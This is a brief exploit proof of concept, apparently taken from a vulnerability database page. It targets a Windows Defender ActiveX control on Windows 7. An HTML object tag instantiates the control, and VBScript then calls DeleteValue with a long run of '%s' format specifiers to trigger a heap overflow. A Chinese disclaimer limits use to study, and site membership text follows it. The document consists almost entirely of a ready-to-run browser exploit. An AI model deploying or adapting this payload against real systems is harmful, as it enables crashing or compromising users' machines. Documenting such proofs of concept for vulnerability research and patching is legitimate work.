#Exploits title :[Microsoft Windows Defender ActiveX Heap Overflow PoC] #tested on :[windows 7] #Microsoft Windows Defender <html> <object classid='clsid:07DD3249-A591-4949-8F20-09CD347C69DC' id='target' ></object> <script language='vbscript'> targetFile = "C:\Program Files\Windows Defender\MsMpCom.dll" prototype = "Sub DeleteValue ( ByVal bstrKeyName As String , ByVal bstrValueName As String )" memberName = "DeleteValue" progid = "MpComExportsLib.MsMpSimpleConfig" argCount = 2 arg1="defaultV" arg2="%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s" target.DeleteValue arg1 ,arg2 </script>
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论